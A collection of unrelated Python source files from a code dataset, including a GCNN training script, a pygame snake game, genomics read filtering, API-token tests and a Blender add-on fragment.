mean_kacc\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'problem',\n help='MILP instance type to process.',\n choices=['setcover', 'cauctions', 'facilities'],\n )\n parser.add_argument(\n '-m', '--model',\n help='GCNN model to be trained.',\n type=str,\n default='baseline',\n )\n parser.add_argument(\n '-s', '--seed',\n help='Random generator seed.',\n type=utilities.valid_seed,\n default=0,\n )\n parser.add_argument(\n '-g', '--gpu',\n help='CUDA GPU id (-1 for CPU).',\n type=int,\n default=0,\n )\n args = parser.parse_args()\n\n ### HYPER PARAMETERS ###\n max_epochs = 1000\n epoch_size = 312\n batch_size = 32\n pretrain_batch_size = 128\n valid_batch_size = 128\n lr = 0.001\n patience = 10\n early_stopping = 20\n top_k = [1, 3, 5, 10]\n\n if args.problem == 
'setcover':\n train_files = list(pathlib.Path('data/samples/setcover/500r_1000c_0.05d/train').glob('sample_*.pkl'))\n valid_files = list(pathlib.Path('data/samples/setcover/500r_1000c_0.05d/valid').glob('sample_*.pkl'))\n\n elif args.problem == 'cauctions':\n train_files = list(pathlib.Path('data/samples/cauctions/100_500/train').glob('sample_*.pkl'))\n valid_files = list(pathlib.Path('data/samples/cauctions/100_500/valid').glob('sample_*.pkl'))\n\n elif args.problem == 'facilities':\n train_files = list(pathlib.Path('data/samples/facilities/100_100_5/train').glob('sample_*.pkl'))\n valid_files = list(pathlib.Path('data/samples/facilities/100_100_5/valid').glob('sample_*.pkl'))\n\n else:\n raise NotImplementedError\n\n running_dir = f\"trained_models/{args.problem}/{args.model}/{args.seed}\"\n\n os.makedirs(running_dir)\n\n ### LOG ###\n logfile = os.path.join(running_dir, 'log.txt')\n\n log(f\"max_epochs: {max_epochs}\", logfile)\n log(f\"epoch_size: {epoch_size}\", logfile)\n log(f\"batch_size: {batch_size}\", logfile)\n log(f\"pretrain_batch_size: {pretrain_batch_size}\", logfile)\n log(f\"valid_batch_size : {valid_batch_size }\", logfile)\n log(f\"lr: {lr}\", logfile)\n log(f\"patience : {patience }\", logfile)\n log(f\"early_stopping : {early_stopping }\", logfile)\n log(f\"top_k: {top_k}\", logfile)\n log(f\"problem: {args.problem}\", logfile)\n log(f\"gpu: {args.gpu}\", logfile)\n log(f\"seed {args.seed}\", logfile)\n\n ### NUMPY / TENSORFLOW SETUP ###\n if args.gpu == -1:\n os.environ['CUDA_VISIBLE_DEVICES'] = ''\n else:\n os.environ['CUDA_VISIBLE_DEVICES'] = f'{args.gpu}'\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n tf.enable_eager_execution(config)\n tf.executing_eagerly()\n\n rng = np.random.RandomState(args.seed)\n tf.set_random_seed(rng.randint(np.iinfo(int).max))\n\n ### SET-UP DATASET ###\n log(f\"{len(train_files)} training samples\", logfile)\n log(f\"{len(valid_files)} validation samples\", logfile)\n\n train_files = [str(x) for x in train_files]\n valid_files = [str(x) for x in valid_files]\n\n valid_data = tf.data.Dataset.from_tensor_slices(valid_files)\n valid_data = valid_data.batch(valid_batch_size)\n valid_data = valid_data.map(load_batch_tf)\n valid_data = valid_data.prefetch(1)\n\n pretrain_files = [f for i, f in enumerate(train_files) if i % 10 == 0]\n pretrain_data = tf.data.Dataset.from_tensor_slices(pretrain_files)\n pretrain_data = pretrain_data.batch(pretrain_batch_size)\n pretrain_data = pretrain_data.map(load_batch_tf)\n pretrain_data = pretrain_data.prefetch(1)\n\n ### MODEL LOADING ###\n sys.path.insert(0, os.path.abspath(f'models/{args.model}'))\n import model\n importlib.reload(model)\n model = model.GCNPolicy()\n del sys.path[0]\n\n ### TRAINING LOOP ###\n optimizer = tf.train.AdamOptimizer(learning_rate=lambda: lr) # dynamic LR trick\n best_loss = np.inf\n for epoch in range(max_epochs + 1):\n log(f\"EPOCH {epoch}...\", logfile)\n epoch_loss_avg = tfe.metrics.Mean()\n epoch_accuracy = tfe.metrics.Accuracy()\n\n # TRAIN\n if epoch == 0:\n n = pretrain(model=model, dataloader=pretrain_data)\n log(f\"PRETRAINED {n} LAYERS\", logfile)\n # model compilation\n model.call = tfe.defun(model.call, input_signature=model.input_signature)\n else:\n # bugfix: tensorflow's shuffle() seems broken...\n epoch_train_files = rng.choice(train_files, epoch_size * batch_size, replace=True)\n train_data = tf.data.Dataset.from_tensor_slices(epoch_train_files)\n train_data = train_data.batch(batch_size)\n train_data = train_data.map(load_batch_tf)\n 
train_data = train_data.prefetch(1)\n train_loss, train_kacc = process(model, train_data, top_k, optimizer)\n log(f\"TRAIN LOSS: {train_loss:0.3f} \" + \"\".join([f\" acc@{k}: {acc:0.3f}\" for k, acc in zip(top_k, train_kacc)]), logfile)\n\n # TEST\n valid_loss, valid_kacc = process(model, valid_data, top_k, None)\n log(f\"VALID LOSS: {valid_loss:0.3f} \" + \"\".join([f\" acc@{k}: {acc:0.3f}\" for k, acc in zip(top_k, valid_kacc)]), logfile)\n\n if valid_loss < best_loss:\n plateau_count = 0\n best_loss = valid_loss\n model.save_state(os.path.join(running_dir, 'best_params.pkl'))\n log(f\" best model so far\", logfile)\n else:\n plateau_count += 1\n if plateau_count % early_stopping == 0:\n log(f\" {plateau_count} epochs without improvement, early stopping\", logfile)\n break\n if plateau_count % patience == 0:\n lr *= 0.2\n log(f\" {plateau_count} epochs without improvement, decreasing learning rate to {lr}\", logfile)\n\n model.restore_state(os.path.join(running_dir, 'best_params.pkl'))\n valid_loss, valid_kacc = process(model, valid_data, top_k, None)\n log(f\"BEST VALID LOSS: {valid_loss:0.3f} \" + \"\".join([f\" acc@{k}: {acc:0.3f}\" for k, acc in zip(top_k, valid_kacc)]), logfile)\n\n","sub_path":"03_train_gcnn.py","file_name":"03_train_gcnn.py","file_ext":"py","file_size_in_byte":11706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"2185562","text":"'''\nCreated on Jan 6, 2016\n\n@author: NVP\n'''\n\nimport pygame\nimport random\nimport math\nglobal size;\nsize = [900,550]\ndef drawCube(screen, color, x, y):\n startX = size[0]/2 + (x-y)*5*math.sqrt(3)\n startY = (x+y)*5\n pygame.draw.polygon(screen, (color[0]-100,color[1]-100,color[2]-100), ((startX+5*math.sqrt(3),startY+5), (startX,startY+10), (startX,startY+20), (startX+5*math.sqrt(3),startY+15)), 0)\n pygame.draw.polygon(screen, (color[0]-66,color[1]-66,color[2]-66), ((startX-5*math.sqrt(3),startY+5), (startX-5*math.sqrt(3),startY+15), (startX,startY+20), (startX,startY+10)), 0)\n pygame.draw.polygon(screen, (color[0],color[1],color[2]), ((startX-5*math.sqrt(3),startY+5), (startX,startY+10), (startX+5*math.sqrt(3),startY+5), (startX,startY)), 0)\n\n \nspeed = 20 #float(input(\"How fast do you want to go?(FPS)\"))\npygame.init()\n\ntext = \"\"\nscreen = pygame.display.set_mode(size)\n#screen2 = pygame.image.load('H:\\\\warploop.gif').convert\npygame.display.set_caption(\"Snake\")\nx = False\nw = False\nwhile w==False:\n clock = pygame.time.Clock()\n Blockx = 4\n Blocky = 4\n keys = pygame.key.get_pressed()\n KR = False\n KD = False\n KL = False\n KU = False\n safetyR = True\n safetyD = True\n safetyL = True\n safetyU = True\n Apple = True\n Colorboost = False\n Pause = False\n safetyp = 0\n safetyBack = True\n R = 0\n G = 0\n B = 0\n Score = 0\n boost = 0\n position = []\n counter = 0\n screen.fill([0,0,0])\n while x == False and Pause==False:\n if Pause==False:\n while(countersortedPosition[(j+1)*2] or (sortedPosition[j*2]==sortedPosition[(j+1)*2] and sortedPosition[j*2+1]>sortedPosition[(j+1)*2+1])):\n tempX = sortedPosition[j*2]\n tempY = sortedPosition[j*2+1]\n sortedPosition[(j)*2] = sortedPosition[(j+1)*2]\n sortedPosition[j*2+1] = sortedPosition[(j+1)*2+1]\n sortedPosition[(j+1)*2] = tempX\n sortedPosition[(j+1)*2+1] = tempY\n #print(sortedPosition)\n #s = \"\"\n while(counter49 or Blocky<0 or Blocky>49:\n x = True\n #print(\"wall\")\n if Applex==Blockx and Appley==Blocky:\n Apple = True\n position.append(700)\n position.append(500)\n position.append(710)\n 
position.append(510)\n position.append(720)\n position.append(520)\n position.append(730)\n position.append(530)\n position.append(Blockx)\n position.append(Blocky)\n# if Score==0:\n# screen.fill([0,0,0])\n Score=Score+20\n position.pop(0)\n position.pop(0)\n clock.tick(speed)\n while Pause:\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_p and safetyp==1:\n Pause = False\n safetyp = 0\n safetyp=1\n if event.type == pygame.QUIT:\n Pause = False\n x = True\n w = True\n print(\"GAME OVER!\")\n font = pygame.font.Font(None, 40)\n text = font.render(\"GAME OVER!\", False, (255, 255, 255))\n screen.blit(text, [340,200])\n print(\"Your score was \"+str(Score))\n text = font.render(\"Your score was \"+str(Score), False, (255, 255, 255))\n screen.blit(text, [320,220])\n text = font.render(\"Press 'space' to restart\", False, (255, 255, 255))\n screen.blit(text, [295,240])\n pygame.display.flip()\n while x==True:\n if w==True:\n break\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n x=False\n if event.type == pygame.QUIT:\n w = True\n while Pause:\n for event in pygame.event.get():\n if event.key == pygame.K_p and safetyp==1:\n Pause = False\n safetyp = 0\n safetyp=1\npygame.quit()\n\n","sub_path":"src/snake3D/snake3Dperspective.py","file_name":"snake3Dperspective.py","file_ext":"py","file_size_in_byte":10252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"294605915","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n'''\n@Author : windz\n@Date : 2020-05-16 15:37:46\n@LastEditTime : 2020-06-24 16:58:34\n@Description : remove reads that lost their 5' end\n the 5' end is located downstream of the annotated first exon, \n likely due to incomplete reverse transcription\n'''\n\n\nimport pysam\nimport pandas as pd\nimport click\n\n\n@click.command()\n@click.option('-i', '--infile', required=True)\n@click.option('-o', '--outfile', required=True)\n@click.option('--first_exon_path', required=True)\ndef main(infile, outfile, first_exon_path):\n\n first_exon_path_df = pd.read_csv(\n first_exon_path, \n sep='\\t',\n index_col=['gene_id']\n )\n\n with pysam.AlignmentFile(infile, 'rb') as inbam, \\\n pysam.AlignmentFile(outfile, 'wb', template=inbam) as outbam:\n for read in inbam:\n read_gene_id = read.get_tag('gi')\n if read_gene_id == 'None':\n continue\n item = first_exon_path_df.loc[read_gene_id]\n is_intact = False\n \n '''\n Filtering criteria for single-exon genes:\n * the 5' end must fall upstream of the point 30% downstream of the gene start\n * and the read's aligned span on the genome (end minus start, not the sequence\n length) must be under 1.5x the gene length; anything longer is probably not this gene\n '''\n if item['is_single_exon']:\n exon_len = item['exon_end']-item['exon_start']\n\n if (read.reference_end-read.reference_start)/exon_len >= 1.5:\n continue\n \n if not read.is_reverse \\\n and read.reference_start < item['exon_start']+exon_len*.3:\n is_intact = True\n elif read.is_reverse \\\n and read.reference_end > item['exon_end']-exon_len*.3:\n is_intact = True\n \n elif not read.is_reverse:\n read_fivePrime_pos = read.reference_start\n first_exon_end = item['exon_end']\n if read_fivePrime_pos <= first_exon_end:\n is_intact = True\n \n else:\n read_threePrime_pos = read.reference_end\n first_exon_start = item['exon_start']\n if read_threePrime_pos >= first_exon_start:\n is_intact = True\n \n if is_intact:\n outbam.write(read)\n\n\nif __name__ == \"__main__\":\n 
main()","sub_path":"pacbio_cdna/script/remove_five_prime_lost.py","file_name":"remove_five_prime_lost.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"290265898","text":"#!/bin/env python3\n\nd = {}\n\nwith open('file.txt') as inf:\n for line in inf:\n my_list = line.lower().split()\n for word in my_list:\n if word in d:\n d[word] += 1\n else:\n d[word] = 1\n\nv = 0\nfor key, value in d.items():\n if value > v:\n k = key\n v = value\n elif value == v and key < k:\n k = key\n v = value\nprint(k, v)\n","sub_path":"stepik_task_2.py","file_name":"stepik_task_2.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"54255826","text":"\"\"\"\nA basic monte-carlo implementation for calculating pi.\n\nNode 0 creates the shared objects and sums the result,\nall other nodes fetches the objects and each worker will work on one object each\n\"\"\"\n\nimport random, math, sys, os, time, logging\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\nfrom Board import Board\nimport PyDOOMS\n\n\n# Worker function\ndef monteCarlo(workerID, myDarts):\n\n if (workerID == 0):\n for boardID in range(PyDOOMS.getNumberOfWorkers()):\n Board(boardID)\n\n PyDOOMS.barrier()\n\n start = time.time()\n board = PyDOOMS.get(workerID)\n\n # Compute\n while (myDarts > 0):\n x = random.random()\n y = random.random()\n dist = math.sqrt((x*x)+(y*y))\n if (dist <= 1.0):\n board.hit()\n else:\n board.miss()\n\n myDarts = myDarts - 1\n board.ready = True\n\n PyDOOMS.objectUpdated(board, \"hits\")\n PyDOOMS.objectUpdated(board, \"darts\")\n PyDOOMS.objectUpdated(board, \"ready\")\n\n\n PyDOOMS.barrier()\n\n # Sum result\n if (workerID == 0):\n pi = 0.0\n i = 0\n while i < PyDOOMS.getNumberOfWorkers():\n b = PyDOOMS.get(i)\n if b.ready:\n pi = pi + b.calc_pi()\n i = i + 1\n else:\n logging.critical(\"Board: \" + str(i) + \" - \" + str(b.ready))\n time.sleep(1)\n\n logging.info(\"Pi: \" + str(pi / PyDOOMS.getNumberOfWorkers()) + \" calculated in \" + str(time.time() - start) + \" seconds.\")\n\n logging.info(\"Worker: \" + str(workerID) + \" dead. 
Worked for \" + str(time.time() - start) + \" seconds.\")\n\n\n\ndarts = 4000000 / PyDOOMS.getNumberOfWorkers()\n\nPyDOOMS.execute(monteCarlo, darts)\n\n","sub_path":"1.0/Benchmarks/MonteCarlo.py","file_name":"MonteCarlo.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"132670244","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 17-6-21 下午3:04\n# @Author : Aries\n# @Site : http://www.liaoxuefeng.com/wiki/0014316089557264a6b348958f449949df42a6d3a2e542c000/001431835236741e42daf5af6514f1a8917b8aaadff31bf000\n# @File : 返回函数.py\n# @Software: PyCharm Community Edition\n# @Function :\n# 函数作为返回值\n# 高阶函数除了可以接受函数作为参数外,还可以把函数作为结果值返回。\n# 我们来实现一个可变参数的求和。通常情况下,求和的函数是这样定义的:\ndef calc_sum(*args):\n sumResult = 0\n for n in args:\n sumResult = sumResult + args\n\n return sumResult\n\n\n# 但是,如果不需要立刻求和,而是在后面的代码中,根据需要再计算怎么办?可以不返回求和的结果,而是返回求和的函数\ndef lazy_sum(*args):\n def sum():\n sumResult = 0\n for arg in args:\n sumResult = sumResult + arg\n\n return sum\n\n\n# 当我们调用lazy_sum()时,返回的并不是求和结果,而是求和函数:\nf = lazy_sum(1, 3, 5, 7, 9)\nprint(f)\nrs = f()\nprint(rs)\n# 在这个例子中,我们在函数lazy_sum中又定义了函数sum,并且,内部函数sum可以引用外部函数lazy_sum的参数和局部变量,当lazy_sum返回函数sum时,相关参数和变量都保存在返回的函数中,这种称为“闭包(Closure)”的程序结构拥有极大的威力。\n# 请再注意一点,当我们调用lazy_sum()时,每次调用都会返回一个新的函数,即使传入相同的参数:\nf1 = lazy_sum(1, 3, 5, 7, 9)\nf2 = lazy_sum(1, 3, 5, 7, 9)\nprint(f1 == f2)\n\nprint('====================================================')\n# 闭包\n# 注意到返回的函数在其定义内部引用了局部变量args,所以,当一个函数返回了一个函数后,其内部的局部变量还被新函数引用,所以,闭包用起来简单,实现起来可不容易。\n# 另一个需要注意的问题是,返回的函数并没有立刻执行,而是直到调用了f()才执行。我们来看一个例子:\n","sub_path":"learnPython/函数式编程/返回函数/返回函数.py","file_name":"返回函数.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"253104500","text":"# -*- encoding: utf-8 -*-\r\nimport urllib\r\nimport urllib2\r\nfrom xml.etree import ElementTree\r\nimport logging \r\n\r\nimport yahoo_dev_api_settings\r\n\r\nclass YahooRelatedWordSearchResult(object):\r\n def __init__(self):\r\n self.item_list = []\r\n \r\nclass YahooRelatedWordSearch(yahoo_dev_api_settings.YahooDevApiBase):\r\n ''' Yahoo Developer Network Related Word Search API http://developer.yahoo.co.jp/webapi/search/assistsearch/v1/webunitsearch.html\r\n parameters \r\n q: query strings\r\n '''\r\n @property\r\n def base_url(self):\r\n return r'http://search.yahooapis.jp/AssistSearchService/V1/webunitSearch'\r\n \r\n @property\r\n def xmlns(self):\r\n return r'urn:yahoo:jp:srchunit'\r\n \r\n def search(self, query_map):\r\n query = ''\r\n plain_query = ''\r\n encode = 'utf-8'\r\n\r\n try:\r\n query = query_map['q']\r\n plain_query = query.encode(encode)\r\n query = urllib.quote(plain_query, self.safe_chars)\r\n except:\r\n pass\r\n \r\n param_map = {'appid':self.aid,\r\n 'query':query,\r\n 'results':'30',\r\n }\r\n \r\n param_list = [key + '=' + param_map[key] \r\n for key in param_map.keys()\r\n ]\r\n \r\n q_results = r'.//%s' % (self.qn('Result'))\r\n \r\n url = self.base_url + '?' 
+ ('&'.join(param_list))\r\n f = urllib2.urlopen(url)\r\n root = ElementTree.parse(f).getroot()\r\n \r\n search_result = YahooRelatedWordSearchResult()\r\n results = root.findall(q_results)\r\n \r\n search_list = []\r\n logging.info(q_results)\r\n for result in results:\r\n search_list.append(result.text)\r\n \r\n search_result.item_list = search_list\r\n return search_result\r\n","sub_path":"typea-mixi01/src/yahoo/yahoo_related_search.py","file_name":"yahoo_related_search.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"248611152","text":"from pathlib import Path\nimport json\n\nBANK_DIRECTORY = \"banks/\"\n\n\ndef convert(bank_number):\n with open(f\"{BANK_DIRECTORY}bank_{bank_number}.json\", \"r\") as b:\n bank = json.load(b)\n bank_info = {\n \"name\": bank[\"name\"],\n \"version\": bank[\"version\"],\n }\n output_dir = f\"{BANK_DIRECTORY}bank_{bank_number}\"\n Path(output_dir).mkdir(exist_ok=True)\n with open(f\"{output_dir}/bank.json\", \"w\") as b:\n json.dump(bank_info, b)\n preset_number = 0\n for p in bank[\"presets\"]:\n with open(f\"{output_dir}/preset_{preset_number}.json\", \"w\") as p_file:\n json.dump(p, p_file)\n preset_number += 1\n\n\nif __name__ == \"__main__\":\n for i in range(1, 11):\n convert(i)\n","sub_path":"esp8266/tools/convert_banks.py","file_name":"convert_banks.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"126107508","text":"import pytest\nfrom flaskapp.api.models.books import Book\nfrom flaskapp.api.models.user import User\nfrom flaskapp.api.models.wish_list import WishList\n\n\n@pytest.mark.parametrize(\n \"mock_model, expected\",\n [\n (Book(isbn=\"123-123\", author=\"bogus\"), 'Book: 123-123'),\n (User(user_id=1, first_name=\"Lane\", last_name=\"bogus\"), 'User: 1'),\n (WishList(user_id=1, isbn=\"123-123\"), 'WishList: 1'),\n ],\n)\ndef test_str_model(mock_model, expected):\n result = str(mock_model)\n assert result == expected\n\n@pytest.mark.parametrize(\n \"mock_model, expected\",\n [\n (Book(isbn=\"123-123\", author=\"bogus\"), '<Book: 123-123>'),\n (User(user_id=1, first_name=\"Lane\", last_name=\"bogus\"), '<User: 1>'),\n (WishList(user_id=1, isbn=\"123-123\"), '<WishList: 1>'),\n ],\n)\ndef test_repr_model(mock_model, expected):\n result = repr(mock_model)\n assert result == expected\n\ndef test_to_dict():\n wish_list = WishList(user_id=1, isbn=\"123-123\")\n result = wish_list.to_dict()\n expected = {'user_id': 1, 'isbn': '123-123'}\n assert result == expected\n","sub_path":"wish_list-main/book_wishlist-main/src/tests/models/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"42463702","text":"import numpy as np\nimport pandas as pd\n\ndef entropia (vp):\n somatorio = 0;\n for p in vp :\n somatorio += 0 if (p == 0) else p * np.log2(p) \n return somatorio * (-1)\n\ndef entropia_valores(valores):\n import collections\n counter = collections.Counter(valores)\n vp = [ (n/len(valores)) for n in counter.values() ] \n return entropia(vp) \n\ndef entropia_atributo(X, atributo, classe) :\n somatorio = 0 \n for valor, Xj in X.groupby(atributo): \n p_Xj = len(Xj) / len(X) \n E_Xj = entropia_valores(Xj[classe])\n somatorio += p_Xj * E_Xj \n return somatorio\n\ndef entropia_atributo_detalhes(X, atributo, classe) :\n somatorio = 0\n detalhes = 
pd.DataFrame(columns = ['valor','prop_Xj'])\n for valor, Xj in X.groupby(atributo): \n p_Xj = len(Xj) / len(X) \n E_Xj = entropia_valores(Xj[classe])\n somatorio += p_Xj * E_Xj\n detalhes = detalhes.append({'valor' : valor, 'prop_Xj' : p_Xj, 'E(Xj)' : E_Xj }, 1)\n return somatorio, detalhes\n\ndef ganho_de_informacao(X,atributo,classe) :\n E_X = entropia_valores(X[classe])\n E_X_A = entropia_atributo(X,atributo,classe)\n return E_X - E_X_A\n\ndef razao_de_ganho (X, atributo, classe):\n IG = ganho_de_informacao(X, atributo, classe)\n I = entropia_valores(X[atributo])\n return IG / I\n\ndef ganho_de_informacao_todos(df,classe):\n return pd.DataFrame({ \n 'InformationGain': df.drop([classe],1).apply(\n lambda x : ganho_de_informacao(df,x.name,classe),0),\n })\n","sub_path":"aula07/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"3656771","text":"import copy\nimport mock\n\nfrom nose.tools import * # flake8: noqa\n\nfrom website.models import User, ApiOAuth2PersonalToken\nfrom website.util import api_v2_url\nfrom website.util import sanitize\n\nfrom tests.base import ApiTestCase\nfrom osf_tests.factories import ApiOAuth2PersonalTokenFactory, AuthUserFactory\n\nTOKEN_LIST_URL = api_v2_url('tokens/', base_route='/')\n\ndef _get_token_detail_route(token):\n path = \"tokens/{}/\".format(token._id)\n return api_v2_url(path, base_route='/')\n\n\nclass TestTokenList(ApiTestCase):\n def setUp(self):\n super(TestTokenList, self).setUp()\n\n self.user1 = AuthUserFactory()\n self.user2 = AuthUserFactory()\n\n self.user1_tokens = [ApiOAuth2PersonalTokenFactory(owner=self.user1) for i in xrange(3)]\n self.user2_tokens = [ApiOAuth2PersonalTokenFactory(owner=self.user2) for i in xrange(2)]\n\n self.user1_list_url = TOKEN_LIST_URL\n self.user2_list_url = TOKEN_LIST_URL\n\n self.sample_data = {\n 'data': {\n 'type': 'tokens',\n 'attributes': {\n 'name': 'A shiny new token',\n 'scopes': 'osf.full_write',\n 'owner': 'Value discarded',\n 'token_id': 'Value discarded',\n }\n }\n }\n\n def test_user1_should_see_only_their_tokens(self):\n res = self.app.get(self.user1_list_url, auth=self.user1.auth)\n assert_equal(len(res.json['data']),\n len(self.user1_tokens))\n\n def test_user2_should_see_only_their_tokens(self):\n res = self.app.get(self.user2_list_url, auth=self.user2.auth)\n assert_equal(len(res.json['data']),\n len(self.user2_tokens))\n\n @mock.patch('framework.auth.cas.CasClient.revoke_tokens')\n def test_deleting_token_should_hide_it_from_api_list(self, mock_method):\n mock_method.return_value(True)\n api_token = self.user1_tokens[0]\n url = _get_token_detail_route(api_token)\n\n res = self.app.delete(url, auth=self.user1.auth)\n assert_equal(res.status_code, 204)\n\n res = self.app.get(self.user1_list_url, auth=self.user1.auth)\n assert_equal(res.status_code, 200)\n assert_equal(len(res.json['data']),\n len(self.user1_tokens) - 1)\n\n def test_created_tokens_are_tied_to_request_user_with_data_specified(self):\n res = self.app.post_json_api(self.user1_list_url, self.sample_data, auth=self.user1.auth)\n assert_equal(res.status_code, 201)\n\n assert_equal(res.json['data']['attributes']['owner'], self.user1._id)\n # Some fields aren't writable; make sure user can't set these\n assert_not_equal(res.json['data']['attributes']['token_id'],\n self.sample_data['data']['attributes']['token_id'])\n\n def test_create_returns_token_id(self):\n res = 
self.app.post_json_api(self.user1_list_url, self.sample_data, auth=self.user1.auth)\n assert_equal(res.status_code, 201)\n assert_true(res.json['data']['attributes'].has_key('token_id'))\n\n def test_field_content_is_sanitized_upon_submission(self):\n bad_text = \"User_text\"\n cleaned_text = sanitize.strip_html(bad_text)\n\n payload = copy.deepcopy(self.sample_data)\n payload['data']['attributes']['name'] = bad_text\n\n res = self.app.post_json_api(self.user1_list_url, payload, auth=self.user1.auth)\n assert_equal(res.status_code, 201)\n assert_equal(res.json['data']['attributes']['name'], cleaned_text)\n\n def test_created_tokens_show_up_in_api_list(self):\n res = self.app.post_json_api(self.user1_list_url, self.sample_data, auth=self.user1.auth)\n assert_equal(res.status_code, 201)\n\n res = self.app.get(self.user1_list_url, auth=self.user1.auth)\n assert_equal(len(res.json['data']),\n len(self.user1_tokens) + 1)\n\n def test_returns_401_when_not_logged_in(self):\n res = self.app.get(self.user1_list_url, expect_errors=True)\n assert_equal(res.status_code, 401)\n\n def test_cannot_create_admin_token(self):\n self.sample_data['data']['attributes']['scopes'] = 'osf.admin'\n res = self.app.post_json_api(self.user1_list_url,\n self.sample_data,\n auth=self.user1.auth,\n expect_errors=True\n )\n assert_equal(res.status_code, 400)\n assert_equal(res.json['errors'][0]['detail'], 'User requested invalid scope')\n\n def test_cannot_create_usercreate_token(self):\n self.sample_data['data']['attributes']['scopes'] = 'osf.users.create'\n res = self.app.post_json_api(self.user1_list_url,\n self.sample_data,\n auth=self.user1.auth,\n expect_errors=True\n )\n assert_equal(res.status_code, 400)\n assert_equal(res.json['errors'][0]['detail'], 'User requested invalid scope')\n","sub_path":"api_tests/tokens/views/test_token_list.py","file_name":"test_token_list.py","file_ext":"py","file_size_in_byte":4945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"451330761","text":"# encoding=utf-8\nimport csv\n# print(abs_lines[1].split(',')[0])\nabs_num_file = open('F:/Label recommendation/ctrsr_datasets/citeulike-a/raw-data.csv', 'r', encoding='utf-8',errors='ignore')\n#text\nreadabs = csv.reader(abs_num_file)\ntag_num_file = open('F:/Label recommendation/ctrsr_datasets/citeulike-a/item-tag.dat', 'r', encoding='utf-8',errors='ignore')\nreadtag = csv.reader(tag_num_file)\ntag_lines = tag_num_file.readlines()\nabs_lines = abs_num_file.readlines()\nout2 = open('F:\\\\Label recommendation\\\\TFIDF\\\\boost_ID.txt','w')\nadd = []\ni = 1\nfor tag_line in tag_lines:\n if len(tag_line) >= 5:\n add.append(i)\n i = i + 1\n out2.write(tag_line)\n else:\n i = i + 1\n# print(add)\nj = 1\nout1 = open('F:\\\\Label recommendation\\\\TFIDF\\\\boost_text.txt','w',encoding='utf-8')\nout1.write(abs_lines[0])\nfor abs_line in abs_lines[1:]:\n temp = abs_line.split(',')[0]\n # print(type(abs_line))\n if int(temp) in add:\n # print(temp)\n out1.write(str(j)+','+' '.join(abs_line.split(',',1)[1:]))\n j += 1 \n\n\n # out1.write(abs_line+'\\n')\n#\n# final_text1 = []\n# final_text2 = []\n# # print(tag_lines[add[0]])\n# j = 0\n# out1 = open('boost_text.txt','w')\n# out2 = open('boost_ID.txt','w')\n# for i in range(0, len(add)):\n# final_text1.append(tag_lines[add[i]].strip())\n# final_text2.append(str(j) + ' ' + str(abs_lines[add[i]].split(',')[1:]))\n# # print(abs_lines[1].split(',')[0])\n# j += 1\n# for k in range(26):\n# # print(final_text1[k])\n# print(final_text2[k])\n# # 
print(abs_lines[1].split(',')[1:])\n# print(final_text2)\n# out1.write(str(final_text1) + '\\n')\n# out2.write(str(final_text2))\n\n\n# print(abs_lines[add[1]])\n\n","sub_path":"TFIDF/new text.py","file_name":"new text.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"187798832","text":"'''\nMARS Blender Tools - a Blender Add-On to work with MARS robot models\n\nFile mtcontrollers.py\n\nCreated on 30 Jan 2014\n\n@author: Kai von Szadkowski\n\nCopy this add-on to your Blender add-on folder and activate it\nin your preferences to gain instant (virtual) world domination.\nYou may use the provided install shell script.\n'''\n\nimport bpy\nfrom bpy.types import Operator\nfrom bpy.props import StringProperty, BoolProperty, FloatProperty\nimport marstools.mtmaterials as mtmaterials\nimport marstools.mtdefs as mtdefs\nimport marstools.mtutility as mtutility\n\n\ndef register():\n print(\"Registering mtcontrollers...\")\n\n\ndef unregister():\n print(\"Unregistering mtcontrollers...\")\n\n\nclass AddControllerOperator(Operator):\n \"\"\"AddControllerOperator\"\"\"\n bl_idname = \"object.mt_add_controller\"\n bl_label = \"Add a node-dependent controller\"\n bl_options = {'REGISTER', 'UNDO'}\n\n controller_scale = FloatProperty(\n name = \"controller scale\",\n default = 0.05,\n description = \"scale of the controller visualization\")\n\n controller_name = StringProperty(\n name = \"controller name\",\n default = 'controller',\n description = \"name of the controller\")\n\n def execute(self, context):\n location = bpy.context.scene.cursor_location\n objects = []\n controllers = []\n for obj in bpy.context.selected_objects:\n if obj.MARStype == \"controller\":\n controllers.append(obj)\n else:\n objects.append(obj)\n if len(controllers) <= 0:\n mtutility.createPrimitive(\"controller\", \"sphere\", self.controller_scale, mtdefs.layerTypes[\"sensor\"], \"controller\", location)\n bpy.context.scene.objects.active.MARStype = \"controller\"\n bpy.context.scene.objects.active.name = \"controller\"\n 